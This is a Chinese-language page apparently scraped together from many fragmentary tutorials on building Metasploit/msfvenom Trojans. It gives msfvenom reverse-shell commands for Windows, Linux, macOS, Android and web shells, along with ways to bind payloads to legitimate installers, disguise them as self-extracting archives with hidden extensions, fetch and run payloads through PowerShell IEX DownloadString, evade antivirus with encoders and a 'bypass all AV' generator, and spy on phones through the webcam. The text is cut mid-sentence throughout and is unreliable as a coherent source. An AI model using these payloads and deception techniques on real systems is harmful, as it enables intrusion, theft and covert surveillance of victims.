前天在群里问了如何生成.wsf msf马,今天写出了实例,分享出来,同时期待亮神的佳作。...wsf后门思路: 1)学习.wsf脚本格式 2)msf生成vbs 3) msf生成vbs插入.wsf脚本格式 4)尝试运行查看是否报错 5)反弹shell 开始制作脚本: 1) .wsf脚本格式 ?...> 2) msf...生成vbs msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport= EXITFUNC=thread -f vbs--platform win...3) msf生成vbs插入.wsf脚本中 ? 4)尝试运行无查看是否报错: 直接运行无报错 ? 使用cscript.exe (WindowsScript Host引擎),运行无报错: ?
捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个...这里就不设置了,默认返回端口是4444 -f: 代表要捆绑的文件类型,这里是一个exe文件 -x:指定你要捆绑的文件的路径及文件名,这里我选择的是root/dy/里的PCQQ2020.exe -o:指定生成的木马文件的路径及文件名...附:msfvenom介绍 msfvenom简介 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线...msfvenom生成 生成payload,有有两个必须的选项:-p和-f 使用-p来指定要使用的payload。...RAR有一个自解压的功能 我们可以利用这一点来达到目的 有两个文件,一个是刚刚生成的木马文件,一个是一个txt文档 全部选中,右击添加到压缩文件,注意这里一定要用rar压缩方式 ?
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。...生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。...webshell脚本 在做web渗透的时候,经常会用到webshell,我们经常用的一句话用菜刀连接,如何使用MSFVenom生成一个可以用msf操作的webshell呢?...php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ASP msfvenom -p windows/meterpreter/reverse_tcp...LHOST= LPORT= -f asp > shell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp
用Digispark制作BadUSB+msf植入病毒木马 UzJuMarkDownImagefebd5266145aad6fbacdd1f73d3e2263.jpg 0x001-简介 概述 在2014...Install Drivers.exe即可 UzJuMarkDownImage5292054b3601bee63d04c4b631447c9e.jpg 0x004 测试阶段 使用kali linux生成一个
本文转自行云博客https://www.xy586.top 文章目录 捆绑木马 RAR自动解压 捆绑木马 使用msfvenom制作木马程序: #生成木马文件 msfvenom -p windows...将木马文件放入靶机中 ?...multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.232.138 set lport 4444 run 将木马程序点击执行...RAR自动解压 设置自动解压运行 设置rar自动解压格式让它在解压时运行恶意程序 模拟文本文档钓鱼 改良木马程序: 伪装:将网页代码和app进行绑定,然后压缩,使用WinRAR创建自解压格式...文本和图标选项中,选择加载我们刚刚生成的icon图标 ? 生成了我们伪装过后的木马程序 ? 同时可以将文件名称改成比较长的名字,在不选中文件的时候,文件名后面部分会被隐藏,达到隐藏后缀名的效果
目录 Msfvenom 生成exe木马 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。...· –c:添加自己的shellcode · –x | -k:捆绑 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27...32位的test.exe文件 利用 upx 加壳 upx -9 test.exe -k -o test2.exe 下面介绍一些生成其他格式的木马!...: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f asp > shell.asp ASPX...) > set payload windows/meterpreter/reverse_tcp #设置payload,不同的木马设置不同的payload msf exploit(handler) >
php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ASP.net: msfvenom -a x86 --platform windows -p...xx.xx.xx.xx/xx [root@localhost ~]# cat &5 >&5; done Python shellcode msf5...> use exploit/multi/script/web_delivery msf5 exploit(multi/script/web_delivery) > set srvhost 192.168.1.30...srvhost => 192.168.1.30 msf5 exploit(multi/script/web_delivery) > set lhost 192.168.1.30 lhost => 192.168.1.30...msf5 exploit(multi/script/web_delivery) > set uripath lyshark uripath => lyshark msf5 exploit(multi/
1 Payload生成方式 (1)windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444...msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c 2 反弹shell生成方式...windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx (8)asp...msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp (9)jsp...11)nodejs msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js 3 MSF
kali中一个经常会用到的框架,今天主要的介绍内容是木马程序的生成和后渗透一些提权。...首先是利用msfvenom生成木马程序 msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=黑客端IP...LPORT=3344 -b "\x00" -e x86/shikata_ga_nai -f exe > msf.exe 这里生成木马之后转到目标机器中 使用命令 msfdb run 运行软件 到这里我们就需要选择一下我们的监听设备...multi/handler 启动监听模块,设置监听载荷 set payload windows/meterpreter/reverse_tcp 设置一下需要的参数,端口和IP 直接run运行监听启动木马
然后使用msfvenom命令生成powershell脚本木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.28 lport=4444...下载MSF产生的木马文件 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.1.18:9889/test') 最后运行木马文件...最后就能在MSF看到反弹的shell ?...最后在MSF能看到反弹的shell。...3.2 结合MSF和Powershell Getshell MSF使用的模块是exploit/multi/script/web_delivery ? ?
不过网上很多的大马都加了后门,例如图中的这款从mumaasp.com这个网站下载的一款大马会将木马的地址和密码提交到http://www.mumaasp.com/xz/sx.asp这个网址 ?...中国菜刀和一句话木马想必是大家最熟悉的了,中国菜刀支持asp、php、asp.net和jsp等web编程语言,小巧的中国菜刀还自带了很多实用的功能。 例如虚拟终端 ?...使用方法也很简单,就是往目标web服务器上传相应的一句话木马。 asp一句话木马: php一句话木马: <?...msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php 其中lhost为目标服务器的地址...成功后会生成一个仿真终端,可以使用load命令来加载模块,之后可以进行上传下载,连接数据库等操作。 只是不能设置密码是个硬伤。
这篇文章主要记录如何调用Msfvenom模块3s生成木马。...length> 为payload预先指定一个NOP滑动长度 -f, --format 指定输出格式 (使用 --help-formats 来获取msf...payload -h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表...LHOST= LPORT= -f asp > shell.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp...raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -x calc.exe -f exe -o shell.exe 2.对上述生成的木马进行
作者丨selph 分析 MSF Windows/exec Shellcode 最近分析漏洞用到msf生成的样本进行测试,其中用到payload选项为Windows/exec cmd="calc.exe"...实验环境 • 虚拟机:Kali Linux 2022.1 x64 • 物理机:Windows 10 21H2 家庭版 • 软件:x86dbg,scdbg,windbg,010 Editor 生成shellcode...使用Kali Linux生成shellcode: ┌──(selph㉿kali)-[~/桌面/shellcode] └─$ msfvenom -p windows/exec cmd=calc.exe...-f raw -o shellcode.bin [-] No platform was selected, choosing Msf::Module::Platform::Windows from the...这里通过下面模板的表格去找对应的偏移即可辅助理解分析中用到的结构,跟着shellcode的反汇编中给出的偏移去找结构,本文中足够用了 具体操作这里就不再介绍,有需要深入了解可自行学习 分析shellcode 准备工作 把生成的
工具简介 一款红队专用免杀木马生成器,该工具可以通过红队人员提供的一段 shellcode 快速生成一个绕过所有杀软的可执行木马。...特点 基于Syscall进行免杀,且随机混淆,可过几乎所有杀软 内置go-strip对Go生成的木马进行编译信息抹除与程序信息混淆 工具本体只有1个exe,搭配Go环境即可直接使用 工具使用 下载二进制文件...,并且在系统上安装Go语言环境,然后将shellcode保存到1个txt文件中,即可使用本工具生成免杀马。...Usage of CuiRi.exe: -f string 通过shellcode生成免杀马 -manual 查看shellcode生成方法 支持的 shellcode 格式分为以下两种...shellcode (2) 生成免杀马 (3) 免杀效果
tid=116 程序名称:Ani网马生成器 生成的JPG文件.可以修改成一些其他后缀名,例如:cur.ico.
操作系统(Linux Windows) web容器(Apache Nginx Tomcat IIS ) 数据库 (mysql sqlserver access oracle) 脚本类型 (PHP jsp asp...转移cs,并添加监听 cs添加监听 从msf将session转移至cs 保留之前meterpreter会话bg,后面可能会用到 使用payload_inject模块 use exploit/windows...msf拿到的session到一定时间会自动离线,这里直接可以在cs中重新派生session,不需要再从头到尾来一遍。...拿下Win2016 生成木马,通过蚁剑上传 生成木马,通过蚁剑上传至10.0.20.99 在任意目录下执行命令,生成木马hacker.exe msfvenom -p windows/x64/meterpreter.../bind_tcp set rhost 10.0.20.99 set lport 8881 run 正向shell-cs拿下WIn2016 配置并启动tcp监听器,类型选Beacon Tcp 生成后门
android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功...也就是你的kali的ip地址 还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的) 1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的...IP地址 2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口 3.exploit //开始执行漏洞 开始监听,等待手机上线 接下来就要发挥你的聪明才智将这个apk...装在你想监控的手机上了 红色框出的地方就说明手机上线了然后可以输入sysinfo 查看手机信息 开启摄像头之后,然后会生成两个文件,双击就可以打开了 webcam_list 查看手机有多少个摄像头
生成木马并连接 使用攻击模块:use exploit/multi/handler 指令:show options – 查看需要填写的参数和参数填写状态 Name Current Setting...LHOST 本地ip LPORT 本地启用端口 查看payload:show payloads 设置payload:set payload windows/meterpreter/reverse_tcp 木马生成...persistence -参数 重新生成一个木马(vbs)放入启动项 五、MSF进程迁移 execute: eg:execute -f notepad...攻击 msf6>use payload/linux/x64/meterpreter/reverse_tcp 进行设置 generate -f 文件格式 -o 输出路径 #生成木马...handler -H 连接ip -P 连接端口 -n 名字 -p payload MSF-Mac攻击 OSX 和linux一样 MSF-Andriod&IOS攻击 MSF-生成跨平台木马 生成源码
1、裸奔马的尝试 意为不做任何免杀处理的木马 1、使用msf的msfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧 命令: msfvenom -p windows/meterpreter...2、MSF编码 在metasploit框架下免杀的方式之一是msf编码器,功能是使用msf编码器对我们制作的木马进行重新编码,生成一个二进制文件,这个文件运行后,msf编码器会将原始程序解码到内存中并执行...(也有对裸奔马进行shikata_ga_nai编码饶AV的方法,但是shikata_ga_nai编码技术多态,每次生成的攻击载荷文件都不一样,有时生成的文件会被查杀,有时不会,所以结合以上思路,生成一个捆绑木马...,并进行shikata_ga_nai编码) 把微信安装包放在/root文件夹下 3、使用msfvenom生成一个Windows环境下的木马,并捆绑到WeChatSetup.exe上生成WeChatSetup1...-i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现 -f /指定msf编码器输出程序的格式 -0 /指定处理完毕后的文件输出路径 4、把生成的文件放在kali中的apache服务对应的文件夹下
搭建服务器、并生成木马 搭建服务器的目的是为了让受害者远程下载木马文件。(服务器的搭建这里不是重点,就不讲了) 利用msf生成木马文件: ?...LHOST为攻击者IP,生成木马文件名字为shell.exe,将这个木马文件放置于web服务器上,以便受害者下载(在不知觉的情况下下载)。 开启监听, 在攻击者主机上运行MSF,并开启监听: ?...上图中攻击代码中的ip地址、木马文件修改为自己的ip地址和自己生成的木马文件。...利用MSF的代理模块,配置MSF的代理模块和本地代理,就可以实现那,具体如下. 我们先配置MSF的代理模块: ?...2.当badusb运行时,发现攻击端的MSF没有反弹。 此时应该考虑两个问题:问题一:木马是否已经下载;问题二:当代码下载后,并运行了木马,但攻击端的MSF仍没有反弹。
领取专属 10元无门槛券
手把手带您无忧上云